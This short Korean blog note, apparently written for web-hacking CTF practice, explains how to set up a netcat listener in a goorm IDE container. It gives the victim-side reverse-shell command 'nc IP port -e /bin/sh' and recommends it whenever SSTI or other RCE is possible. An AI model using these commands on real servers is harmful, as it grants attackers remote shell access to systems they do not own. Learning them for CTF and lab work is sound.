셸인지 쉘인지 그게 중요한가 싶지만 어찌됐든 웹해킹문제 풀 때 언젠간 쓸모 있을 거 같아 만들어 놓는다 ㅎㅎ
구름 IDE에 들어가서 가입 후 컨테이너를 블랭크로 만든다.
그 뒤에 설정에 들어가 내부포트를 설정해준다.
nc 설치
apt-get install netcat
(공격자) 포트 열기
nc -lvp 내부포트
(희생자 서버)그리고 리버스 셸
nc IP주소 외부포트-e /bin/sh
원격코드 실행이 된다면 유용하게 쓸 수 있을 거 같다.
뭐 SSTI라던가 혹은 다른 RCE가 가능하다면 리버스 셸도 하나의 유용한 방법일 듯
리버스 셸은 기본이다 기본 ㅇㅇ
이 사이트도 야무진 사이트다.